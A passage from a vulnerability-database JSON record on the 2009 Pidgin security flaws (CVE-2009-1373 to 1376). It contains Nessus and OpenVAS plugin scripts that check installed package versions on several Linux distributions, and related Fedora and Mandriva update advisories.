exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"pidgin-1.5.1-3.el3\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"finch-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"finch-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"libpurple-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"libpurple-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"libpurple-perl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"libpurple-tcl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"pidgin-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"pidgin-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"pidgin-perl-2.5.5-2.el4\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"finch-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"finch-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libpurple-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libpurple-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libpurple-perl-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libpurple-tcl-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"pidgin-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"pidgin-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"pidgin-perl-2.5.5-3.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:35", "description": "It was discovered that Pidgin did not properly handle certain\nmalformed messages when sending a file using the XMPP protocol\nhandler. If a user were tricked into sending a file, a remote attacker\ncould send a specially crafted response and cause Pidgin to crash, or\npossibly execute arbitrary code with user privileges. (CVE-2009-1373)\n\nIt was discovered that Pidgin did not properly handle certain\nmalformed messages in the QQ protocol handler. A remote attacker could\nsend a specially crafted message and cause Pidgin to crash. This issue\nonly affected Ubuntu 8.10 and 9.04. (CVE-2009-1374)\n\nIt was discovered that Pidgin did not properly handle certain\nmalformed messages in the XMPP and Sametime protocol handlers. A\nremote attacker could send a specially crafted message and cause\nPidgin to crash. (CVE-2009-1375)\n\nIt was discovered that Pidgin did not properly handle certain\nmalformed messages in the MSN protocol handler. A remote attacker\ncould send a specially crafted message and possibly execute arbitrary\ncode with user privileges. (CVE-2009-1376).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2009-06-04T00:00:00", "title": "Ubuntu 8.04 LTS / 8.10 / 9.04 : pidgin vulnerabilities (USN-781-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-06-04T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libpurple0", "p-cpe:/a:canonical:ubuntu_linux:pidgin-dev", "p-cpe:/a:canonical:ubuntu_linux:pidgin-data", "p-cpe:/a:canonical:ubuntu_linux:finch", "p-cpe:/a:canonical:ubuntu_linux:libpurple-dev", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:finch-dev", "p-cpe:/a:canonical:ubuntu_linux:gaim", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04", "p-cpe:/a:canonical:ubuntu_linux:libpurple-bin", "p-cpe:/a:canonical:ubuntu_linux:pidgin-dbg", "p-cpe:/a:canonical:ubuntu_linux:pidgin"], "id": "UBUNTU_USN-781-1.NASL", "href": "https://www.tenable.com/plugins/nessus/39312", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-781-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39312);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\");\n script_bugtraq_id(35067);\n script_xref(name:\"USN\", value:\"781-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 8.10 / 9.04 : pidgin vulnerabilities (USN-781-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Pidgin did not properly handle certain\nmalformed messages when sending a file using the XMPP protocol\nhandler. If a user were tricked into sending a file, a remote attacker\ncould send a specially crafted response and cause Pidgin to crash, or\npossibly execute arbitrary code with user privileges. (CVE-2009-1373)\n\nIt was discovered that Pidgin did not properly handle certain\nmalformed messages in the QQ protocol handler. A remote attacker could\nsend a specially crafted message and cause Pidgin to crash. This issue\nonly affected Ubuntu 8.10 and 9.04. (CVE-2009-1374)\n\nIt was discovered that Pidgin did not properly handle certain\nmalformed messages in the XMPP and Sametime protocol handlers. A\nremote attacker could send a specially crafted message and cause\nPidgin to crash. (CVE-2009-1375)\n\nIt was discovered that Pidgin did not properly handle certain\nmalformed messages in the MSN protocol handler. A remote attacker\ncould send a specially crafted message and possibly execute arbitrary\ncode with user privileges. (CVE-2009-1376).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/781-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:finch-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|8\\.10|9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 8.10 / 9.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"finch\", pkgver:\"2.4.1-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"finch-dev\", pkgver:\"2.4.1-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"gaim\", pkgver:\"2.4.1-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple-bin\", pkgver:\"2.4.1-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple-dev\", pkgver:\"2.4.1-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple0\", pkgver:\"2.4.1-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin\", pkgver:\"1:2.4.1-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-data\", pkgver:\"2.4.1-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-dbg\", pkgver:\"2.4.1-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-dev\", pkgver:\"2.4.1-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"finch\", pkgver:\"2.5.2-0ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"finch-dev\", pkgver:\"2.5.2-0ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpurple-bin\", pkgver:\"2.5.2-0ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpurple-dev\", pkgver:\"2.5.2-0ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpurple0\", pkgver:\"2.5.2-0ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin\", pkgver:\"1:2.5.2-0ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-data\", pkgver:\"2.5.2-0ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-dbg\", pkgver:\"2.5.2-0ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-dev\", pkgver:\"2.5.2-0ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"finch\", pkgver:\"2.5.5-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"finch-dev\", pkgver:\"2.5.5-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple-bin\", pkgver:\"2.5.5-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple-dev\", pkgver:\"2.5.5-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple0\", pkgver:\"2.5.5-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin\", pkgver:\"1:2.5.5-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-data\", pkgver:\"2.5.5-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-dbg\", pkgver:\"2.5.5-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-dev\", pkgver:\"2.5.5-1ubuntu8.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-dev / gaim / libpurple-bin / libpurple-dev / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2927", "CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1375", "CVE-2009-1376"], "description": "Pidgin allows you to talk to anyone using a variety of messaging protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu, ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and Zephyr. These protocols are implemented using a modular, easy to use design. To use a protocol, just add an account using the account editor. Pidgin supports many common features of other clients, as well as many unique features, such as perl scripting, TCL scripting and C plugins. Pidgin is not affiliated with or endorsed by America Online, Inc., Microsoft Corporation, Yahoo! Inc., or ICQ Inc. ", "modified": "2009-06-02T14:26:30", "published": "2009-06-02T14:26:30", "id": "FEDORA:A53CF10F80A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: pidgin-2.5.6-1.fc9", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2927", "CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1375", "CVE-2009-1376"], "description": "Pidgin allows you to talk to anyone using a variety of messaging protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu, ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and Zephyr. These protocols are implemented using a modular, easy to use design. To use a protocol, just add an account using the account editor. Pidgin supports many common features of other clients, as well as many unique features, such as perl scripting, TCL scripting and C plugins. Pidgin is not affiliated with or endorsed by America Online, Inc., Microsoft Corporation, Yahoo! Inc., or ICQ Inc. ", "modified": "2009-06-02T14:28:31", "published": "2009-06-02T14:28:31", "id": "FEDORA:AD43210F80A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: pidgin-2.5.6-1.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2927", "CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1375", "CVE-2009-1376"], "description": "Pidgin allows you to talk to anyone using a variety of messaging protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu, ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and Zephyr. These protocols are implemented using a modular, easy to use design. To use a protocol, just add an account using the account editor. Pidgin supports many common features of other clients, as well as many unique features, such as perl scripting, TCL scripting and C plugins. Pidgin is not affiliated with or endorsed by America Online, Inc., Microsoft Corporation, Yahoo! Inc., or ICQ Inc. ", "modified": "2009-06-02T14:33:34", "published": "2009-06-02T14:33:34", "id": "FEDORA:F0DBC10F8A0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: pidgin-2.5.6-1.fc10", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:56:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "The remote host is missing an update to pidgin\nannounced via advisory MDVSA-2009:173.", "modified": "2017-07-07T00:00:00", "published": "2009-08-17T00:00:00", "id": "OPENVAS:64516", "href": "http://plugins.openvas.org/nasl.php?oid=64516", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:173 (pidgin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_173.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:173 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Security vulnerabilities has been identified and fixed in pidgin:\n\nBuffer overflow in the XMPP SOCKS5 bytestream server in Pidgin\n(formerly Gaim) before 2.5.6 allows remote authenticated users to\nexecute arbitrary code via vectors involving an outbound XMPP file\ntransfer. NOTE: some of these details are obtained from third party\ninformation (CVE-2009-1373).\n\nBuffer overflow in the decrypt_out function in Pidgin (formerly Gaim)\nbefore 2.5.6 allows remote attackers to cause a denial of service\n(application crash) via a QQ packet (CVE-2009-1374).\n\nThe PurpleCircBuffer implementation in Pidgin (formerly Gaim) before\n2.5.6 does not properly maintain a certain buffer, which allows\nremote attackers to cause a denial of service (memory corruption\nand application crash) via vectors involving the (1) XMPP or (2)\nSametime protocol (CVE-2009-1375).\n\nMultiple integer overflows in the msn_slplink_process_msg functions in\nthe MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and\n(2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim)\nbefore 2.5.6 on 32-bit platforms allow remote attackers to execute\narbitrary code via a malformed SLP message with a crafted offset\nvalue, leading to buffer overflows. NOTE: this issue exists because\nof an incomplete fix for CVE-2008-2927 (CVE-2009-1376).\n\nThis update provides pidgin 2.5.8, which is not vulnerable to these\nissues.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:173\nhttp://pidgin.im/news/security/\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory MDVSA-2009:173.\";\n\n \n\nif(description)\n{\n script_id(64516);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2008-2927\", \"CVE-2009-1376\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:173 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libfinch0\", rpm:\"libfinch0~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libmeanwhile1\", rpm:\"libmeanwhile1~1.0.2~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libmeanwhile1-devel\", rpm:\"libmeanwhile1-devel~1.0.2~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libmeanwhile1-doc\", rpm:\"libmeanwhile1-doc~1.0.2~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple0\", rpm:\"libpurple0~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-bonjour\", rpm:\"pidgin-bonjour~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-client\", rpm:\"pidgin-client~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-gevolution\", rpm:\"pidgin-gevolution~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-i18n\", rpm:\"pidgin-i18n~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-meanwhile\", rpm:\"pidgin-meanwhile~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-mono\", rpm:\"pidgin-mono~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-plugins\", rpm:\"pidgin-plugins~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-silc\", rpm:\"pidgin-silc~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-tcl\", rpm:\"pidgin-tcl~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64finch0\", rpm:\"lib64finch0~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64meanwhile1\", rpm:\"lib64meanwhile1~1.0.2~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64meanwhile1-devel\", rpm:\"lib64meanwhile1-devel~1.0.2~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64meanwhile1-doc\", rpm:\"lib64meanwhile1-doc~1.0.2~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64purple0\", rpm:\"lib64purple0~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64purple-devel\", rpm:\"lib64purple-devel~2.5.8~0.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-5552.", "modified": "2017-07-10T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:64101", "href": "http://plugins.openvas.org/nasl.php?oid=64101", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-5552 (pidgin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5552.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5552 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis is a bugfix & security fix release of Pidgin. The full ChangeLog is\navailable at http://developer.pidgin.im/wiki/ChangeLog Details of the\nsecurity fixes included are available at http://www.pidgin.im/news/security/\n\nChangeLog:\n\n* Wed May 20 2009 Stu Tomlinson 2.5.6-1\n- 2.5.6\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update pidgin' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5552\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-5552.\";\n\n\n\nif(description)\n{\n script_id(64101);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", 